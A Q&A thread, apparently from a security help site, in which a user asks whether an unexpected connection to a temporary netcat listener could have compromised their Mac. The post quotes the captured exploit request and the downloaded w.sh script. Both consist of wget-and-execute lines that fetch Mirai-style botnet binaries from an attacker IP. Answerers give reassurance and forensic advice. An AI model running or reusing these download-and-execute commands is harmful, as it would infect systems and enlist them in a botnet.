1

TLDR

Someone has connected to my netcat server and tried to execute a command. Is it possible they have done any harm to me/my computer/my network?

Detailed story

I've been learning about networking and sockets recently. As a programming exercise I created a simple tcp client and wanted to test it with a netcat server.

Everything worked as expected - my client had connected to the server correctly.

My friend asked me to send them the client app so they can have a look. In order for the app to work for them with my local server I had to setup port forwarding on my router. I always knew it can be dangerous so I only wanted to set it up temporarily.

I started the sever with a netcat command:

nc -lvp 8080

and the next thing I notice is that someone has connected to my server but it wasn't my friend!

In my netcat output I can see this:

Connection from 1.192.147.162:60185
POST /cgi-bin/ViewLog.asp HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

/bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%

You can see the Host as 192.168.0.14, but there's no such device on my network! However I do understand the headers can be easily forged.

I have downloaded the w.sh to have a look at its contents - here they are:

wget http://135.148.104.21/bins/arm; chmod 777 arm; ./arm unidentified.arm
wget http://135.148.104.21/bins/arm5; chmod 777 arm5; ./arm5 unidentified.arm5
wget http://135.148.104.21/bins/arm6; chmod 777 arm6; ./arm6 unidentified.arm6
wget http://135.148.104.21/bins/arm7; chmod 777 arm7; ./arm7 unidentified.arm7
wget http://135.148.104.21/bins/mips; chmod 777 mips; ./mips unidentified.mips
wget http://135.148.104.21/bins/mipsel; chmod 777 mipsel; ./mipsel unidentified.mipsel
wget http://135.148.104.21/bins/x86; chmod 777 x86; ./x86 unidentified.x86
wget http://135.148.104.21/bins/i686; chmod 777 i686; ./i686 unidentified.i686
wget http://135.148.104.21/bins/i586; chmod 777 i586; ./i586 unidentified.i586
wget http://135.148.104.21/bins/arc; chmod 777 arc; ./arc unidentified.arc
wget http://135.148.104.21/bins/sh4; chmod 777 sh4; ./sh4 unidentified.sh4


rm $0

I have downloaded one of the above files but it seems that they're binary, so I didn't know how to analayse them.

Definetely seems like the attacker from China (location of the IP) was trying to download a script, execute it and gather some info from my computer, and likely tried to connect my computer to the mirai botnet (credits to the reddit user henrique_wavy for finding this). However the question is: is it even possible with the netcat server I was running? Am I in danger here?

Of course I have disabled the port forwarding straight away...

I'm running MacOS 12.6 and the GNU netcat 0.7.1 if it matters

Improve this question
1
  • 3
    netcat should just be echoing what was sent to it over that port. For what it's worth, that looks like an external script attempting to exploit a ASP web server's /cgi-bin/ViewLog.asp to have it execute commands locally. Since the connection wasn't to an ASP web server (and therefore didn't have the vulnerability this was meant to exploit), you're probably ok. Other commands might have been executed that do exploit netcat, but it's a lot less likely. Use this experience as a lesson in how ubiquitous the bad actors are, and carry on. FYI 8080 is a popular "the other web server" port.
    – Gus
    Commented Oct 10, 2022 at 15:01

2 Answers 2

Reset to default
1

Old post, however...

No. Obvi, attempted attack. Yet based on your command, absolutely not.

This...

nc -lvp 8080

...is not connected to anything.

Assuming that is the whole story. If that is the whole server, nothing for them to access. Looks like a bot trying to probe ability to manipulate your CGI. You don't have CGI, according to what you posted. Simple netcat server. They are counting on exploiting a full-blown webserver. Not your little listener. Which is rightfully and technically-speaking, a server. But if that is the whole command,nothing for them to run. And only access is data you feed via command-line.

The only thing they can do with nc -lvp 8080 is wait for you to type something.

Literally, failed threat. Only output there is what you type after, in the window-- IF the agent accepts it.

Also, bot is looking for a Linux server. You running on Linux?

Definitely nothing happening here, except failed exploits.

Script they trying to run... /bin/busybox wget http://135.148.104.21/w.sh; chmod +x w.sh; ./w.sh%

Can only run on linux-based webserver that has busybox. But script is only presented as text. Which is all it is. It has to be executed to actually do anything other than display it's own code for you to see.

Improve this answer
0

Is it possible? Yes. Is it probable? No, but it depends on a lot. The shorter the amount of time the process was listening, the better, and the less chance that someone or some script compromised the system.

Is the netcat listener running and listening as a privileged user or a regular user? If it's running as a regular user, that's better.

How are you logging the incoming connections? Are you only seeing standard out?

Does the system have some type of security subsystem like selinux? If so that would do a lot to restrict what system capabilities an un-trusted process would be able to use.

If it was just a script passing by, finding your listening socket bound to a port and then connecting, you "may" be ok, but you would need to have been logging all incoming packets and auditing all system calls, and watching the process list to be sure, and you would need to have confidence that the log files weren't modified or altered, better yet, you have a remote log server configured and are forwarding all log events to it.

Having a baseline cryptographic hash of all files on the file system, created beforehand, and stored somewhere other than the same hard drive, would also allow you to validate that nothing on the file system changed. You could generate all the hashes again and verify that they all match.

Improve this answer
8
  • Answer edited to remove mention of starting a shell.
    – Chris
    Commented Oct 11, 2022 at 21:04
  • How are you logging the incoming connections? Are you only seeing standard out? I ran netcat in a verbose mode (nc -lvp 8080) and everything was displayed to my terminal that's all I know about logging. Is the netcat listener runnin and listenening as a priviliged user or a regular user? It was running as me without sudo, so a regular user I guess. I understand that your answer aims at the question in the title - thanks! - but the more specific question I asked is: is it possible that someone has executed commands on my computer if I was just running nc -lvp 8080 on my machine?
    – nom4d
    Commented Oct 12, 2022 at 7:43
  • My guess is no, based on the fact that the only output you see is from the one script connecting and trying a non-applicable windows exploit. Were you always running nc in verbose mode, or was it left running for a while without verbosity? Do you have a logger running? If so, have you gone through all of the system logs to see if there's anything that stands out? I would note as closely as possible the date and time when nc was running, and look at all events at and around that time stamp in all of your logs as a next step.
    – Chris
    Commented Oct 12, 2022 at 15:48
  • A "safer" way to test your app with your friend who's remote is to configure the port forward rule to only allow incoming connections to tcp/8080 from his public IP address. He can use whatismyip.com or similar sites to determine what it is. If your router's software doesn't allow you to specify the port forward from just one IP, consider replacing it with a better router. I would only enable the forward while your friend is testing, and I would turn it off when not needed.
    – Chris
    Commented Oct 12, 2022 at 16:01
  • @Chris Ummm... don't you think that is all a bit overkill for a command statement that can only write to stdout? And furthermore, relies only on stdin for input? Are you actually familiar with this command?
    – jdmayfield
    Commented Nov 23, 2023 at 9:01

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .